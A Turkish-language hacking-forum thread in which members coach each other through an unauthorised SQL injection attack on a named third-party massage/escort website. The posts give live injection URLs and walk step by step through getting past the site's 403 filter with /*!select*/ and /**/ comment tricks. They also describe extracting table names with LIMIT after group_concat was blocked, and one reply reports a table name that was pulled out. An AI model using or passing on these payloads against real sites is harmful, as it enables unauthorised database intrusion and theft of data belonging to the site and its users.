

Sql İnjection 403 Forbidden Sorunu ?
-
Merhaba arkadaşlar bir tane eskort site üzerinde sql denerken 403 forbidden olayı çıktı ama onu bypass yöntemi ile hallettim ama kolon sayısını yansıttığı zaman kolonların tablo isimlerini bulmaya çalışırken tekrardan aynı sorunu verdi acaba sorun nerde
http://massage-erotic-montreal.com/hostess.php?id=24+order+by+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21-- (NORMAL)
http://massage-erotic-montreal.com/hostess.php?id=-24+order+by+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21-- (SAYILARI GÖSTERDİ)
http://massage-erotic-montreal.com/hostess.php?id=24+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21-- (403 FORBİDDEN)
http://massage-erotic-montreal.com/hostess.php?id=-24+union+/*!select*/+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21-- (BYPASS)
bundan sonra kolonları yazınca nedense yeniden 403 olayını vuruyor acaba nerede bir yanlışım var ?
-
hex veya char kullan
-
Hocam hex kullan ben genelde hexle hallediyordum hex(unhex().
uğraşmayalı baya oldu ama bi dene
-
yok hocam hex yemedi char olayıda olmadı acaba hex ile char dökümanlarını varsa paylsabilirmisiniz.
-
hex değilde sex sitesi mi burası sdjfasld montreale gidicem bir ay sonra kullanabilirim burayı dursun :)
-
Hocam başka bir konu açıcaktım sırf bu vereceğim cevap için :) (yapabilirimde yeni taktikler için )
İnan sabahtan beri uğraşıyorum 2 saat oldu bypass edene kadar canım çıktı
Amaç sizlerin öğrenmesi anlatayım şimdi
Sen sadece rakamları çıkarmayı halletmişsin gördümki tablo falan çekemiyorsun
Webmaster karakterleri filtrelemiş özellikle tables adını filtrelemiş bunu adım adım giderek farkettim
yani
http://massage-erotic-montreal.com/hostess.php?id=-24+UNION+/*!select*/+ALL+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+From (sorun yok )
http://massage-erotic-montreal.com/hostess.php?id=-24+UNION+/*!select*/+ALL+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+information_schema.table (görüyoruzki table de bile sorun yok ama )
http://massage-erotic-montreal.com/hostess.php?id=-24+UNION+/*!select*/+ALL+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+information_schema.tables ( yaptığımız an bum adminini filtresi devreye giriyor 403 forbidden çıktı )
Filtreyi ise sırayla /**/ ile aştım yani
uyguladım gördükki sorunsuz açıldı +1
şimdi adam group_concat fonksiyonunuda kapatmış yani tabloları topluca alamıyoruz
yapınca sorun yok chracter_Sets bilmem ne diye verdi ama bu tablo işe yaramaz group_concat ile alayını çekmek lazım fakat
yapınca forbidden a düştük istesek buda aşılır ama ben limit yöntemi kullandım onu filtrelemeyi akıl etmemiş
Limitli yöntem kullanınca göreceğizki sular seller gibi akacak
gibi sayıları artırarak sırayla çekebilirsiniz
Artık bi zahmet kolonları falanda sen kas :) hep hazır bekleme
Herkese saygılar sevgiler
-
@Twitter:
Hacı tunceliye gelince haber eyle, şöyle net çeken bir yerde,(tabiki üninin kantininde) biraz takılalım, ben yemek ısmarlarım sende sql injection gösterirsin :))
-
karakter filitreleyince bu iş bitiyor mu?
-
bu kolonlarda
hostesses
textes verdi :D